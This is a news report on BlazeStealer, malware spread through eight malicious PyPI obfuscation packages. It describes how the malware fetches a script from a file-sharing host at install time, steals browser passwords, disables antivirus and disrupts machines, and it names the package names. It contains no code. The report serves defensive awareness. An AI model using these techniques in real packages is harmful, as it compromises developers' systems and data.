The BlazeStealer malware has spread in the PyPI repository to infect and compromise developers.
Based on reports, the malicious threat has made its way into the Python Package Index (PyPI) repository, targeting those who seek seemingly harmless obfuscation tools. Researchers recently discovered this malware. They explained that BlazeStealer could allow hackers to gain complete control over compromised developer systems.
The campaign first appeared earlier this year and involves eight deceptive packages, such as Pyobftoexe, Pyobfusfile, Pyobfexecute, Pyobfpremium, Pyobflite, Pyobfadvance, Pyobfuse, and pyobfgood – the last of which was published in October.
These packages include setup.py and init.py files that could retrieve a Python script hosted on transfer[.]sh, which executes immediately upon installation.
The BlazeStealer malware becomes a bot after infecting a target to access data.
According to investigations, the BlazeStealer malware operates as a Discord bot that could enable its operators to access sensitive information.
It can harvest passwords from web browsers, capture screenshots, execute arbitrary commands, encrypt files, and even deactivate Microsoft Defender Antivirus on the victim’s computer.
Furthermore, it can disrupt a device by increasing CPU usage, inserting a Windows Batch script in the startup directory to shut down the machine, and even triggering a dreaded blue screen of death (BSoD) error.
Separate research also emphasised that developers engaged in code obfuscation often handle valuable and sensitive information, making them an attractive target for hackers. The campaign has the most downloads from the U.S., followed by China, Russia, Ireland, Hong Kong, Croatia, France, and Spain, with 2,438 downloads before researchers observed the malicious packages and removed them from PyPI.
Experts explained the importance of vigilance in the open-source domain. Hence, developers should scrutinise every package before downloading it. This discovery aligns with a broader trend in recent years where open-source repositories have become lucrative platforms for threat actors to distribute malware.
Therefore, every developer should improve their awareness and security measures in the software supply chain. Regardless of their speciality, these developers must remain cautious and proactive to safeguard their valuable information from emerging threats like BlazeStealer since threat actors will likely continue supplying them with malware-laden packages.
